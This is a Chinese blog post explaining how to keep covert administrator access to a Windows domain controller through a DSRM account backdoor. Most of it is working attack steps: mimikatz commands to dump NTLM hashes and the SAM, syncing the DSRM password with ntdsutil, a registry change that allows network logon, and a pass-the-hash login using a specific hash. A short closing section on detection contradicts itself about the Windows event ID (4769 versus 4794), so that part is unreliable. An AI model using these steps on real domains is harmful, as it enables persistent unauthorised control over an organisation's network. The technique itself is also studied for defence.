首页 > 其他分享 >域内权限维持:DSRM后门

域内权限维持:DSRM后门

时间:2023-01-29 10:24:39浏览次数:65  
标签:后门 Hash 登录 NTLM 密码 mimikatz DSRM 权限

01、简介

每个域控制器都有一个目录还原模式(DSRM)帐户,它的密码是在安装域控时设置的,实际上它对应的就是sam文件里的本地管理员“administrator”,基本很少会被重置,因此有着极强的隐蔽性。攻击者通过获取域控的DSRM密码,就可以使用帐户通过网络登录到域控服务器,从而达到权限维持的目的。

02、利用方式

(1)获取域内用户Hash

使用mimikatz查看域内用户test的NTLM Hash。

mimikatz # privilege::debug
mimikatz # lsadump::lsa /patch /name:test

(2)将DSRM帐户和域用户的NTLM Hash同步

使用DSRM的密码和指定域用户test的密码进行同步,在命令行环境中使用ntdsutil工具重置DSRM管理员密码。

(3)抓取DSRM密码

因同步域内用户test的NTLM Hash,可以发现,DSRM Hash 和域用户test的NTLM Hash一致。

mimikatz # privilege::debug
mimikatz # token::elevate
mimikatz # lsadump::sam

(4)修改DSRM登录方式

DSRM 有三种登录方式,具体如下:

0:默认值,只有当域控制器重启并进入 DSRM 模式时,才可以使用 DSRM 管理员账号
1:只有当本地 AD、DS 服务停止时,才可以使用 DSRM 管理员账号登录域控制器
2:在任何情况下,都可以使用 DSRM 管理员账号登录域控制器

如果要使用 DSRM 账号通过网络登录域控制器,需要将该值设置为 2。

修改注册表:

reg add "HKLM\System\CurrentControlSet\Control\Lsa" /f /v DsrmAdminLogonBehavior /t REG_DWORD /d 2

(5)使用DSRM远程登录

在域成员服务器上使用DSRM进行远程登录,注意domain使用域控的主机名。

mimikatz # privilege::debug
mimikatz # sekurlsa::pth /user:administrator /domain:win-dc01 /ntlm:44f077e27f6fef69e7bd834c7242b040

 03、检测方法

当攻击者尝试重置DSRM管理员密码或是指定域内用户NTLM Hash同步时,都会生成4769事件,因此可以实时监控4794事件,一旦攻击者尝试修改DSRM密码就会触发告警。

 

标签:后门,Hash,登录,NTLM,密码,mimikatz,DSRM,权限
From: https://www.cnblogs.com/xiaozi/p/17038486.html

相关文章

  • 域内权限维持:注入SSP
    01、简介SSP(SecuritySupportProvider)是Windows操作系统安全机制的提供者。简单地说,SSP是个DLL文件,主要用来实现Windows操作系统的身份认证功能。在系统启动时,SSP将被......
  • 域内权限维持:AdminSDHolder
    01、简介AdminSDHolder是一个特殊的AD容器,通常作为某些特权组成员的对象的安全模板。ActiveDirectory将采用AdminSDHolder对象的ACL并定期将其应用于所有受保护的AD账......
  • 域内权限维持:SID History后门
    01、简介每个用户都有一个关联的安全标识符(SID),SIDHistory的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户......
  • 域内权限维持:Skeleton Key(万能密码)
     01、简介SkeletonKey(万能密码),是一种可以对域内权限进行持久化的操作,通过将SkeletonKey注入到lsass进程,无需重启域控即可生效,而且能够在不影响当前域用户正常登录的情......
  • phpstudy后门文件md5
    php5.2.17正常php5.2.17版本对应扩展文件:php_xmlrpc.dllmd5码:8d3478e98eea61730d1522425e055db8后门MD5:0F7AD38E7A9857523DFBCE4BCE43A9E9php5.4.45正常......
  • 更改linux文件/目录的权限、拥有者及用户组
    在Linux中,创建一个文件时,该文件的拥有者都是创建该文件的用户。该文件用户可以修改该文件的拥有者及用户组,root用户可以修改任何文件的拥有者及用户组。在Linux中,对于文......
  • linux文件权限命令学习
    ls命令可以查看Linux系统上的文件、目录和设备的权限。上述ls-l命令中显示的第一列就是文件权限信息,共11位字符,分5部分。第1位表示存档类型,d表示目录,-表示一般文件。......
  • Linux笔记03: Linux常用命令_3.5权限管理命令
     3.5权限管理命令3.5.1权限介绍1.为什么需要权限绝大多数用户使用的是个人计算机,而使用个人计算机的用户一般都是被信任的用户(如家人、朋友等)。在这种情况下,大家都可......
  • ASP.NET2.0运行时提示:以一种访问权限不允许的方式做了一个访问套接字的尝试
    在调试ASP.NET的时候常出现如下错误错误消息框:   未能开始侦听端口xxxxx以一种访问权限不允许的方式做了一个访问套接字的尝试解决方法:找到该项目的sln......
  • PHP语言Laravel9+Layui后台权限管理系统
    项目介绍一款PHP语言基于Laravel9.x、Layui、MySQL等框架精心打造的一款模块化、插件化、高性能的前后端分离架构敏捷开发框架,可用于快速搭建前后端分离后台管理系统,本着......